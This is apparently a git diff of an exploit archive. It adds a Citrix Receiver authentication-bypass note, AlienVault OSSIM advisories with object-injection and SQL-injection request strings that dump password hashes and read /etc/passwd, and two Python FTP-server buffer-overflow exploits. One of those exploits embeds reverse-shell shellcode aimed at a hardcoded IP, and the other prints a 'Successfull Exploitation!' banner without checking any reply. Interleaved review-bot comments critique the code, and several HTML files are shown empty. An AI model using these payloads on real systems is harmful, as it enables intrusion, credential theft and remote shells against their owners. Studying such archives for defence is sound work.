+
+# Title: Citrix Receiver/Receiver Desktop Lock 4.5 Incorrect Access Control
+# CVE: CVE-2016-9111
+# Date of Discovery: October 27 2016
+# Exploit Author: Rithwik Jayasimha
+# Author Homepage/Contact: https://thel3l.me
+# Vendor Name: Citrix
+# Vendor Homepage: https://www.citrix.com/
+# Software Link: Receiver - https://www.citrix.com/go/receiver.html
+ Receiver Desktop Lock - https://www.citrix.com/downloads/citrix-receiver/additional-client-software/receiver-desktop-lock-45.html
+# Version: 10.6.3
+# Tested on: Windows 8.1, macOS 10.12.1 Sierra
+# Category: local
+# Vulnerability type: Incorrect Access Control
+
+
+# Description: Allows attacker with physical access to VDI to bypass authentication requirement. Citrix Receiver and/or Desktop Lock for Mac OSX and Windows suffer from a local incorrect access control.
+To exploit this:
+1. An attacker would first identify a VDI with a logged in user, which has been locked.
+2. The attacker then proceeds to disconnect the system from the network temporarily (removing and reinserting the LAN cable is enough).
+3. Citrix Receiver then proceeds to unlock the session and allows the attacker full access to the connected user's account without confirming the user's identity.
+
+# Additional Notes, References and links:
+ * This exploit is not 100% reliable - it may take a couple of tries to be able to accurately reproduce this behavior.
+ * This attack has only been attempted with physical access - it may also be possible to remotely script a restart of a network adapter to cause the same behavior.
diff --git a/platforms/php/webapps/15721.txt b/platforms/php/webapps/15721.txt
index 94f3a9a6d..c3978613e 100755
--- a/platforms/php/webapps/15721.txt
+++ b/platforms/php/webapps/15721.txt
@@ -4,5 +4,4 @@ # Software Link: http://extensions.joomla.org/extensions/directory-a-documentation/portfolio/14834 # Version: 1.1.2 -index.php?option=com_billyportfolio&view=billyportfolio&catid=-1 and -if(1,benchmark(5000000,md5(1)),1) +index.php?option=com_billyportfolio&view=billyportfolio&catid=-1 and if(1,benchmark(5000000,md5(1)),1) diff --git a/platforms/php/webapps/35965.txt b/platforms/php/webapps/35965.txt deleted file mode 100755 index 9979c1f5f..000000000 --- a/platforms/php/webapps/35965.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/48692/info - -The 'com_resman' component for Joomla! is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. - -An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. - -http://www.example.com/index.php?option=com_resman&task=list&city= \ No newline at end of file diff --git a/platforms/php/webapps/40682.txt b/platforms/php/webapps/40682.txt new file mode 100755 index 000000000..ff3f4c2f1 --- /dev/null +++ b/platforms/php/webapps/40682.txt 
@@ -0,0 +1,50 @@
+Details
+=======
+
+Product: Alienvault OSSIM/USM
+Vulnerability: PHP Object Injection
+Author: Peter Lapp, lappsec () gmail com
+CVE: CVE-2016-8580
+Vulnerable Versions: <=5.3.1
+Fixed Version: 5.3.2
+
+
+
+Vulnerability Details
+=====================
+
+A PHP object injection vulnerability exists in multiple widget files
+due to the unsafe use of the unserialize() function. The affected
+files include flow_chart.php, gauge.php, honeypot.php,
+image.php,inventory.php, otx.php, rss.php, security.php, siem.php,
+taxonomy.php, tickets.php, and url.php.
+An authenticated attacker could send a serialized PHP object to one of
+the vulnerable pages and potentially gain code execution via magic
+methods in included classes.
+
+
+
+POC
+====
+
+This benign POC injects the IDS_Report class from PHPIDS into the
+refresh parameter of image.php. The __toString method of IDS_Report is
+then executed and the output is displayed in the value of the content
+field in the response:
+
+/ossim/dashboard/sections/widgets/data/image.php?type=test&wtype=blah&height=1&range=1&class=1&id=&adj=1&value=a%3A5%3A{s%3A3%3A%22top%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22adjustment%22%3Bs%3A8%3A%22original%22%3Bs%3A6%3A%22height%22%3Bs%3A3%3A%22123%22%3Bs%3A7%3A%22refresh%22%3BO%3A10%3A%22IDS_Report%22%3A3%3A{s%3A9%3A%22%00*%00events%22%3Bs%3A9%3A%22testevent%22%3Bs%3A7%3A%22%00*%00tags%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22%00*%00impact%22%3Bs%3A16%3A%22Object+Injection%22%3B}s%3A7%3A%22content%22%3Bs%3A36%3A%22aHR0cDovL3d3dy50ZXN0LmNvbS8xLnBuZw%3D%3D%22%3B}
+
+
+
+Timeline
+========
+
+08/03/16 - Reported to Vendor
+10/03/16 - Fixed in version 5.3.2
+
+
+
+References
+==========
+
+https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities
diff --git a/platforms/php/webapps/40683.txt b/platforms/php/webapps/40683.txt
new file mode 100755
index 000000000..418fd6f36
--- /dev/null
+++ b/platforms/php/webapps/40683.txt
@@ -0,0 +1,46 @@ +Details +======= + +Product: Alienvault OSSIM/USM +Vulnerability: Stored XSS +Author: Peter Lapp, lappsec () gmail com +CVE: CVE-2016-8581 +CVSS: 3.5 +Vulnerable Versions: <=5.3.1 +Fixed Version: 5.3.2 + + + +Vulnerability Details +===================== + +A stored XSS vulnerability exists in the User-Agent header of the +login process. It's possible to inject a script into that header that +then gets executed when mousing over the User-Agent field in Settings +-> Current Sessions. + + + +POC +=== + +The POC uses jQuery to send all session IDs on the "Current Sessions" +page to an arbitrary site (Google, in this case) + + + + + +Timeline +======== + +08/03/16 - Reported to Vendor +10/03/16 - Fixed in version 5.3.2 + + + +References +========== + +https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities \ No newline at end of file diff --git a/platforms/php/webapps/40684.txt b/platforms/php/webapps/40684.txt new file mode 100755 index 000000000..a27b7ccd4 --- /dev/null +++ b/platforms/php/webapps/40684.txt 
@@ -0,0 +1,53 @@
+Details
+=======
+
+Product: Alienvault OSSIM/USM
+Vulnerability: SQL Injection
+Author: Peter Lapp, lappsec () gmail com
+CVE: CVE-2016-8582
+Vulnerable Versions: <=5.3.1
+Fixed Version: 5.3.2
+
+
+
+Vulnerability Details
+=====================
+
+A SQL injection vulnerability exists in the value parameter of
+/ossim/dashboard/sections/widgets/data/gauge.php on line 231. By
+sending a serialized array with a SQL query in the type field, it's
+possible to execute an arbitrary SQL query. The result is not
+displayed on the screen, but it can be exploited as a blind SQLi or
+have the output directed to a file and then retrieved via another
+request. Authentication is required.
+
+
+
+POC
+===
+
+This request will dump user password hashes to a file:
+
+/ossim/dashboard/sections/widgets/data/gauge.php?&type=alarm&wtype=blah&asset=1&height=1&value=a%3A1%3A%7Bs%3A4%3A%22type%22%3Bs%3A67%3A%22pass+from+users+INTO+OUTFILE+%27%2Ftmp%2F10.0.0.123_pass_tshark.pcap%27--+-%22%3B%7D
+
+The file containing the output can then be retrieved with the following request:
+/ossim/pcap/download.php?scan_name=pass&sensor_ip=10.0.0.123
+
+It's also possible to read the contents of any file readable by the
+mysql user by using mysql's load_file function. For example, changing
+the request to something like select load_file('/etc/passwd') .
+
+
+
+Timeline
+========
+
+08/03/16 - Reported to Vendor
+10/03/16 - Fixed in version 5.3.2
+
+
+
+References
+==========
+
+https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities
\ No newline at end of file
diff --git a/platforms/php/webapps/40692.html b/platforms/php/webapps/40692.html
new file mode 100755
index 000000000..542dac14b
--- /dev/null
+++ b/platforms/php/webapps/40692.html
@@ -0,0 +1,35 @@ + + + + +
+ + +
+ + + + + + + + + + + diff --git a/platforms/windows/dos/40685.html b/platforms/windows/dos/40685.html new file mode 100755 index 000000000..fdf79fcd7 --- /dev/null +++ b/platforms/windows/dos/40685.html @@ -0,0 +1,41 @@ + + + + + + + \ No newline at end of file diff --git a/platforms/windows/dos/40691.html b/platforms/windows/dos/40691.html new file mode 100755 index 000000000..70a00bc84 --- /dev/null +++ b/platforms/windows/dos/40691.html @@ -0,0 +1,36 @@ + + + + + \ No newline at end of file diff --git a/platforms/windows/remote/40680.py b/platforms/windows/remote/40680.py new file mode 100755 index 000000000..cdf9f1002 --- /dev/null +++ b/platforms/windows/remote/40680.py 
@@ -0,0 +1,56 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+# Exploit Title: PCMan's FTP Server 2.0.7 UMASK Command Buffer Overflow Exploit
+# Date: 1/11/2016
+# Exploit Author: Eagleblack
+# Tested on: Windows XP Profesional SP3 Spanish version x86
+# CVE : N/A
+
+
+import socket
+ret="\x10\xb3\x3d\x7e" #USER32 this dll have a jump to ESP stack pointer
+
+#Metasploit shellcode:
+#msfvenom -p windows/shell_reverse_tcp LHOST='IP address Local host' LPORT='' -b '\x00\x0a\x0d' -f c
+
+shellcode = ("\xd9\xe5\xba\x7e\xd1\x2c\x95\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
+"\x52\x31\x50\x17\x83\xe8\xfc\x03\x2e\xc2\xce\x60\x32\x0c\x8c"
+"\x8b\xca\xcd\xf1\x02\x2f\xfc\x31\x70\x24\xaf\x81\xf2\x68\x5c"
+"\x69\x56\x98\xd7\x1f\x7f\xaf\x50\x95\x59\x9e\x61\x86\x9a\x81"
+"\xe1\xd5\xce\x61\xdb\x15\x03\x60\x1c\x4b\xee\x30\xf5\x07\x5d"
+"\xa4\x72\x5d\x5e\x4f\xc8\x73\xe6\xac\x99\x72\xc7\x63\x91\x2c"
+"\xc7\x82\x76\x45\x4e\x9c\x9b\x60\x18\x17\x6f\x1e\x9b\xf1\xa1"
+"\xdf\x30\x3c\x0e\x12\x48\x79\xa9\xcd\x3f\x73\xc9\x70\x38\x40"
+"\xb3\xae\xcd\x52\x13\x24\x75\xbe\xa5\xe9\xe0\x35\xa9\x46\x66"
+"\x11\xae\x59\xab\x2a\xca\xd2\x4a\xfc\x5a\xa0\x68\xd8\x07\x72"
+"\x10\x79\xe2\xd5\x2d\x99\x4d\x89\x8b\xd2\x60\xde\xa1\xb9\xec"
+"\x13\x88\x41\xed\x3b\x9b\x32\xdf\xe4\x37\xdc\x53\x6c\x9e\x1b"
+"\x93\x47\x66\xb3\x6a\x68\x97\x9a\xa8\x3c\xc7\xb4\x19\x3d\x8c"
+"\x44\xa5\xe8\x03\x14\x09\x43\xe4\xc4\xe9\x33\x8c\x0e\xe6\x6c"
+"\xac\x31\x2c\x05\x47\xc8\xa7\xea\x30\xd3\x30\x83\x42\xd3\x3f"
+"\xe8\xca\x35\x55\x1e\x9b\xee\xc2\x87\x86\x64\x72\x47\x1d\x01"
+"\xb4\xc3\x92\xf6\x7b\x24\xde\xe4\xec\xc4\x95\x56\xba\xdb\x03"
+"\xfe\x20\x49\xc8\xfe\x2f\x72\x47\xa9\x78\x44\x9e\x3f\x95\xff"
+"\x08\x5d\x64\x99\x73\xe5\xb3\x5a\x7d\xe4\x36\xe6\x59\xf6\x8e"
+"\xe7\xe5\xa2\x5e\xbe\xb3\x1c\x19\x68\x72\xf6\xf3\xc7\xdc\x9e"
+"\x82\x2b\xdf\xd8\x8a\x61\xa9\x04\x3a\xdc\xec\x3b\xf3\x88\xf8"
+"\x44\xe9\x28\x06\x9f\xa9\x59\x4d\xbd\x98\xf1\x08\x54\x99\x9f"
+"\xaa\x83\xde\x99\x28\x21\x9f\x5d\x30\x40\x9a\x1a\xf6\xb9\xd6"
+"\x33\x93\xbd\x45\x33\xb6")
+
+buffer = '\x41'* 2006 + ret + '\x90'* 30 + shellcode #EIP overwritten at offset 2006
+print "Sending Buffer"
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #open socket
+connect = s.connect(('192.168.1.13',21)) #IP address and port (21) from the target
+s.recv(1024) #FTPBanner
+s.send('USER anonymous\r\n') #Sending USER
+s.recv(1024)
+s.send('PASS \r\n') #Sending Password (Null password)
+s.recv(1024)
+s.send('UMASK' + buffer +'\r\n')
+s.close()
+
+
+
diff --git a/platforms/windows/remote/40681.py b/platforms/windows/remote/40681.py
new file mode 100755
index 000000000..cb9be6753
--- /dev/null
+++ b/platforms/windows/remote/40681.py
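Review bot: The `shellcode` blob is committed as opaque bytes while the generating command in the comment above it leaves `LHOST` and `LPORT` as placeholders, so the callback address and port encoded in those bytes are recorded nowhere in the file. Anyone triaging this entry, or writing detection content from it, has to disassemble the blob to learn where it connects; a comment next to `shellcode = (` such as `# bytes embed the author's lab LHOST/LPORT (values not recorded in this file)` would make that explicit. The header has a similar gap for defenders: `# CVE : N/A` and no affected-build or fixed-version line beyond the `2.0.7` in the title. The shebang names plain `python` although `print "Sending Buffer"` is Python 2 syntax, and `connect = s.connect(...)` binds `None` to a name that is never read.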
@@ -0,0 +1,55 @@
+import socket
+import sys
+import os
+
+print '''
+
+ ##############################################
+ # Created: ScrR1pTK1dd13 #
+ # Name: Greg Priest #
+ # Mail: ScrR1pTK1dd13.slammer@gmail.com #
+ ##############################################
+
+# Exploit Title: FreefloatFTPserver1.0_dir_command_remotecode_exploit
+# Date: 2016.11.02
+# Exploit Author: Greg Priest
+# Version: FreefloatFTPserver1.0
+# Tested on: Windows7 x64 HUN/ENG Professional
+'''
+
+ip = raw_input("Target ip: ")
+port = 21
+overflow = 'A' * 247
+eip = '\xF4\xAF\xEA\x75' + '\x90' * 10
+#shellcode calc.exe
+shellcode =(
+"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
+"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
+"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
+"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
+"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
+"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
+"\x45\x81\x3e\x43\x72\x65\x61\x75" +
+"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
+"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
+"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
+"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
+"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
+"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
+"\x53\x53\x53\x53\x52\x53\xff\xd7")
+
+remotecode = overflow + eip + shellcode + '\r\n'
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect((ip ,port))
+s.recv(1024)
+s.send('USER anonymous\r\n')
+s.recv(1024)
+s.send('PASSW hacker@hacker.net\r\n')
+s.recv(1024)
+print '''
+Successfull Exploitation!
+'''
+message = 'dir ' + remotecode
+s.send(message)
+s.recv(1024)
+s.close
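Review bot: `s.close` on the last line only references the method and never calls it, so the socket is left for the interpreter to reclaim; it should read `s.close()`. The `Successfull Exploitation!` banner is printed before `s.send(message)` and without looking at any reply, so the script's output says nothing about whether the host is actually affected, which matters when the file is used to confirm a patch. I would drop the banner or replace it with a neutral `print 'Request sent'` after the send. `import sys` and `import os` are unused, and `raw_input` plus the `print '''` statements make the file Python 2 only, which it does not state.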